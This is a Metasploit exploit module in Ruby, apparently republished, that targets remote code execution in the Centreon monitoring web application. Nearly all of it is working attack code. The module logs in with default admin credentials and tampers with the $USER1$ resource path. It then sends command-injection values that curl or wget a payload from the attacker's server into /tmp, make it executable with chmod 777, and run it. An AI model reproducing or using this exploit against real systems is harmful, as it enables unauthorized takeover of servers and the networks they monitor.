### This module requires Metasploit: https://metasploit.com/download# Curren

1. ##
2. # This module requires Metasploit: https://metasploit.com/download
3. # Current source: https://github.com/rapid7/metasploit-framework
4. ##
5.  
6. class MetasploitModule < Msf::Exploit::Remote
7. Rank = NormalRanking
8.  
9. include Msf::Exploit::Remote::HttpClient
10. include Msf::Exploit::Remote::HttpServer::HTML
11. include Msf::Exploit::EXE
12.  
13. def initialize(info = {})
14. super(update_info(info,
15. "Name" => "Centreon RCE",
16. "Description" => %q{
17. rce
18. },
19. "License" => MSF_LICENSE,
20. "Platform" => "linux",
21. "Targets" => [
22. ["Centreon", {}],
23. ],
24. "Stance" => Msf::Exploit::Stance::Aggressive,
25. "Privileged" => false,
26. "DisclosureDate" => "Sep 17 2019",
27. "DefaultOptions" => {
28. "SRVPORT" => 80,
29. },
30. "DefaultTarget" => 0))
31.  
32. register_options(
33. [
34. OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
35. OptString.new("METHOD", [true, "Method", "curl"]),
36. OptString.new("USERNAME", [true, "The URI of the Centreon Application", "admin"]),
37. OptString.new("PASSWORD", [true, "The URI of the Centreon Application", ""]),
38. OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
39. ]
40. )
41. end
42.  
43. def check
44. res = send_request_cgi(
45. "uri" => normalize_uri(target_uri.path, "index.php"),
46. "method" => "GET",
47. )
48. @phpsessid = res.get_cookies
49. /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
50.  
51. if token
52. print_status("Successfully got token #{token}")
53. res = send_request_cgi!(
54. "uri" => normalize_uri(target_uri.path, "index.php"),
55. "method" => "POST",
56. "cookie" => @phpsessid,
57. "vars_post" => {
58. "useralias" => datastore["USERNAME"],
59. "password" => datastore["PASSWORD"],
60. "centreon_token" => token,
61. },
62. )
63. if res.body.include? "You need to enable JavaScript to run this app"
64. Exploit::CheckCode::Appears
65. else
66. Exploit::CheckCode::Unknown
67. end
68. end
69. end
70.  
71. def exploit
72. begin
73. res = send_request_cgi(
74. "uri" => normalize_uri(target_uri.path, "index.php"),
75. "method" => "GET",
76. )
77. @phpsessid = res.get_cookies
78. /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
79.  
80. if token
81. print_status("Successfully got token #{token}")
82. res = send_request_cgi!(
83. "uri" => normalize_uri(target_uri.path, "index.php"),
84. "method" => "POST",
85. "cookie" => @phpsessid,
86. "vars_post" => {
87. "useralias" => datastore["USERNAME"],
88. "password" => datastore["PASSWORD"],
89. "centreon_token" => token,
90. },
91. )
92. if res.body.include? "You need to enable JavaScript to run this app"
93. res = send_request_cgi(
94. "uri" => normalize_uri(target_uri.path, "main.get.php"),
95. "method" => "GET",
96. "cookie" => @phpsessid,
97. "vars_get" => {
98. "p" => "60904",
99. "o" => "c",
100. "resource_id" => 1,
101. },
102. )
103. /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
104. /resource_line\".*value=\"(?<old_path>.*?)\"/ =~ res.body
105. @old_path = old_path
106. res = send_request_cgi(
107. "uri" => normalize_uri(target_uri.path, "main.get.php", "?p=60904"),
108. "method" => "POST",
109. "cookie" => @phpsessid,
110. "vars_post" => { "resource_name": "$USER1$", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": "" "a:0:{}" "", "centreon_token": token },
111. )
112. begin
113. Timeout.timeout(datastore["HTTPDELAY"]) { super }
114. rescue Timeout::Error
115. print_good("timeout")
116. vprint_error("timeout")
117. end
118. else
119. vprint_error("Cannot login")
120. end
121. else
122. vprint_error("Couldn't get token")
123. end
124. rescue ::Rex::ConnectionError
125. vprint_error("Connection error")
126. end
127. end
128.  
129. def primer
130. @pl = generate_payload_exe
131. @path = service.resources.keys[0]
132. binding_ip = srvhost_addr
133.  
134. proto = datastore["SSL"] ? "https" : "http"
135. payload_uri = "#{proto}://#{binding_ip}/#{@path}"
136. send_payload(payload_uri)
137. end
138.  
139. def send_payload(payload_uri)
140. if datastore["method"] == "curl"
141. payload = "/bin/bash -c \"curl #{payload_uri} -o /tmp/#{@path}\""
142. else
143. payload = "/bin/bash -c \"wget #{payload_uri} -O /tmp/#{@path}\""
144. end
145. res = send_request_cgi(
146. "uri" => normalize_uri(target_uri.path, "main.get.php"),
147. "method" => "POST",
148. "cookie" => @phpsessid,
149. "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
150. )
151. end
152.  
153. def on_request_uri(cli, req)
154. print_good("#{peer} - Payload request received: #{req.uri}")
155. send_response(cli, @pl)
156. run_shell
157. stop_service
158. end
159.  
160. def run_shell
161. res = send_request_cgi(
162. "uri" => normalize_uri(target_uri.path, "main.get.php"),
163. "method" => "POST",
164. "cookie" => @phpsessid,
165. "vars_get" => {
166. "p": "60801",
167. "command_hostaddress": "",
168. "command_example": "",
169. "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"",
170. "o": "p",
171. "min": 1,
172. },
173. )
174.  
175. res = send_request_cgi(
176. "uri" => normalize_uri(target_uri.path, "main.get.php"),
177. "method" => "POST",
178. "cookie" => @phpsessid,
179. "vars_get" => {
180. "p": "60801",
181. "command_hostaddress": "",
182. "command_example": "",
183. "command_line": "/tmp/#{@path}",
184. "o": "p",
185. "min": 1,
186. },
187. )
188. end
189. end